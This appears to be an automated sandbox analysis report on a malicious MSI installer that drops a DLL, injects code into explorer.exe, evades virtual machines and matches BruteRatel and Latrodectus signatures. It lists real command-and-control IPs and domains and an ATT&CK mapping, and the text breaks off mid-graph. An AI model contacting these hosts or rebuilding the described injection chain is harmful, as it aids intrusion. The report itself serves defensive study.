            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: medk.msi, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI8F42.tmp, 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp, MSI8F42.tmp, 00000004.00000000.2131539788.0000000000337000.00000002.00000001.01000000.00000003.sdmp, medk.msi, MSI8F42.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800D2C10 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00000001800D2C10
            Source: tab.dll.2.drStatic PE information: real checksum: 0x16c5c6 should be: 0x1a4b0f
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0031323C push ecx; ret 4_2_0031324F
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800043FA push rbp; retf 6_2_00000001800043FB
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180004437 push rbp; retf 6_2_0000000180004438
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000430A push rbp; retf 6_2_000000018000430B
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180004326 push rbp; retf 6_2_0000000180004327

            Persistence and Installation Behavior

            barindex
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI8F42.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8DD8.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8F42.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8D3A.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8D89.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8E17.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\tab.dllJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8DD8.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8F42.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8D3A.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8D89.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8E17.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_02E07274
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_02E08424
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,8_2_02E10610
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 584Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8864Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8DD8.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8D3A.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8D89.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8E17.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\tab.dllJump to dropped file
            Source: C:\Windows\System32\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-9410
            Source: C:\Windows\Installer\MSI8F42.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-33326
            Source: C:\Windows\Installer\MSI8F42.tmpAPI coverage: 6.9 %
            Source: C:\Windows\System32\rundll32.exeAPI coverage: 0.6 %
            Source: C:\Windows\explorer.exe TID: 5412Thread sleep count: 225 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 5412Thread sleep time: -225000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 1340Thread sleep count: 584 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -58400s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 5412Thread sleep count: 8864 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 5412Thread sleep time: -8864000s >= -30000sJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0032AF79 FindFirstFileExW,4_2_0032AF79
            Source: C:\Windows\explorer.exeCode function: 8_2_02E0A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,8_2_02E0A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_02E02B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_02E02B28
            Source: rundll32.exe, 00000006.00000002.4567543964.00000293119F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW !
            Source: explorer.exe, 00000008.00000002.4581549359.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
            Source: explorer.exe, 00000008.00000000.2238643975.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000008.00000002.4581549359.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
            Source: explorer.exe, 00000008.00000003.3082377493.00000000098E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
            Source: explorer.exe, 00000008.00000000.2244189194.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}user
            Source: explorer.exe, 00000008.00000002.4581549359.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
            Source: explorer.exe, 00000008.00000000.2233677069.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A7F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000008.00000000.2233677069.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
            Source: explorer.exe, 00000008.00000002.4591272026.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 'me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
            Source: explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000008.00000003.3082377493.00000000098E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
            Source: explorer.exe, 00000008.00000000.2233677069.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000008.00000000.2233677069.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000008.00000003.3082377493.00000000098E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_002FD0A5 IsDebuggerPresent,OutputDebugStringW,4_2_002FD0A5
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800D65BC GetLastError,OutputDebugStringW,6_2_00000001800D65BC
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800D2C10 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00000001800D2C10
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0032AD78 mov eax, dword ptr fs:[00000030h]4_2_0032AD78
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_00322DCC mov ecx, dword ptr fs:[00000030h]4_2_00322DCC
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_002F2310 GetProcessHeap,4_2_002F2310
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI8F42.tmp "C:\Windows\Installer\MSI8F42.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\tab.dll, ObjectJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_003133A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_003133A8
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_0031353F SetUnhandledExceptionFilter,4_2_0031353F
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_00312968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00312968
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_00316E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00316E1B
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800D50A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00000001800D50A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800DBA64 VirtualAllocExNuma,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800DBA64

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 87.120.37.120 9043Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 45.143.166.230 9043Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 2E00000 protect: page execute and read and writeJump to behavior
            Contains functionality to inject threads in other processes
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_00007DF4DD100100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_3_00007DF4DD100100
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 2E00000Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 2E00000 value starts with: 4D5AJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 4004 base: 2E00000 value: 4DJump to behavior
            Sets debug register (to hijack the execution of another thread)
            Source: C:\Windows\System32\rundll32.exeThread register set: 3784 1Jump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 2E00000Jump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_002F52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,4_2_002F52F0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180001510 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,6_2_0000000180001510
            Source: explorer.exe, 00000008.00000002.4567636465.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2233973197.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: explorer.exe, 00000008.00000002.4567636465.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2235166234.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2233973197.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000008.00000002.4567636465.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2233973197.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000008.00000000.2233677069.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4564271151.0000000000D68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
            Source: explorer.exe, 00000008.00000002.4567636465.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2233973197.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000008.00000000.2238643975.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3075025138.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_003135A9 cpuid 4_2_003135A9
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: EnumSystemLocalesW,4_2_0032E0C6
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: EnumSystemLocalesW,4_2_00327132
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: EnumSystemLocalesW,4_2_0032E111
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: EnumSystemLocalesW,4_2_0032E1AC
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_0032E237
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: GetLocaleInfoEx,4_2_003123F8
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: GetLocaleInfoW,4_2_0032E48A
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0032E5B3
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: GetLocaleInfoW,4_2_0032E6B9
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: GetLocaleInfoW,4_2_003276AF
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_0032E788
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_0032DE24
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_00000001800FA4C8
            Source: C:\Windows\System32\rundll32.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,6_2_00000001800FA160
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_00000001800FA598
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00000001800FA9D8
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_00000001800EFEA8
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,6_2_00000001800F0328
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00000001800FABBC
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_003137D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_003137D5
            Source: C:\Windows\explorer.exeCode function: 8_2_02E08D3C GetUserNameA,wsprintfA,8_2_02E08D3C
            Source: C:\Windows\Installer\MSI8F42.tmpCode function: 4_2_00327B1F GetTimeZoneInformation,4_2_00327B1F
            Source: C:\Windows\explorer.exeCode function: 8_2_02E100E8 RtlGetVersion,8_2_02E100E8

            Stealing of Sensitive Information

            barindex
            Yara detected BruteRatel
            Source: Yara matchFile source: 00000006.00000003.2232622768.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2232567502.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2232697308.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3784, type: MEMORYSTR
            Yara detected Latrodectus
            Source: Yara matchFile source: 00000008.00000002.4591745236.000000000E21B000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected BruteRatel
            Source: Yara matchFile source: 00000006.00000003.2232622768.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2232567502.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2232697308.000002931397B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3784, type: MEMORYSTR
            Yara detected Latrodectus
            Source: Yara matchFile source: 00000008.00000002.4591745236.000000000E21B000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Replication Through Removable Media            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		OS Credential Dumping2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory11
            Peripheral Device Discovery            		Remote Desktop ProtocolData from Removable Media11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)82
            Process Injection            		2
            Obfuscated Files or Information            		Security Account Manager1
            Account Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            File Deletion            		LSA Secrets34
            System Information Discovery            		SSHKeylogging114
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
            Masquerading            		Cached Domain Credentials31
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Virtualization/Sandbox Evasion            		DCSync1
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job82
            Process Injection            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Rundll32            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            System Network Configuration Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555319 Sample: medk.msi Startdate: 13/11/2024 Architecture: WINDOWS Score: 100 39 samomol.com 2->39 41 ergiholim.com 2->41 43 2 other IPs or domains 2->43 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 7 other signatures 2->63 8 rundll32.exe 2->8         started        10 msiexec.exe 14 40 2->10         started        14 msiexec.exe 2 2->14         started        signatures3 process4 file5 16 rundll32.exe 8 12 8->16         started        27 C:\Windows\Installer\MSI8F42.tmp, PE32 10->27 dropped 29 C:\Users\user\AppData\Roaming\tab.dll, PE32+ 10->29 dropped 31 C:\Windows\Installer\MSI8E17.tmp, PE32 10->31 dropped 33 3 other files (none is malicious) 10->33 dropped 65 Drops executables to the windows directory (C:\Windows) and starts them 10->65 20 msiexec.exe 10->20         started        22 MSI8F42.tmp 10->22         started        signatures6 process7 dnsIp8 35 samomol.com 87.120.37.120, 49982, 9043 NETERRA-ASBG Bulgaria 16->35 37 burjog.com 45.143.166.230, 49710, 49711, 50009 ITTITT-ASRU Russian Federation 16->37 49 System process connects to 